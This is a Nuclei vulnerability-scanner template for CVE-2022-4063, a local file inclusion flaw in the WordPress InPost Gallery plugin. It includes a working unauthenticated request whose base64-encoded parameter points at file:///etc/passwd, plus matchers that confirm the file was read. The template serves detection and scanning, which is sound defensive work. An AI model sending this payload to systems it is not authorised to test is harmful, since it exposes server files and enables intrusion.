nuclei-templates/http/cves/2022/CVE-2022-4063.yaml

48 lines
1.5 KiB
YAML

id: CVE-2022-4063
info:
name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
author: theamanrawat
severity: critical
description: |
WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
reference:
- https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
- https://wordpress.org/plugins/inpost-gallery/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4063
remediation: Fixed in version 2.1.4.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4063
cwe-id: CWE-22
cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:*:*:*
epss-score: 0.01177
metadata:
max-request: 1
verified: true
tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2023/03/13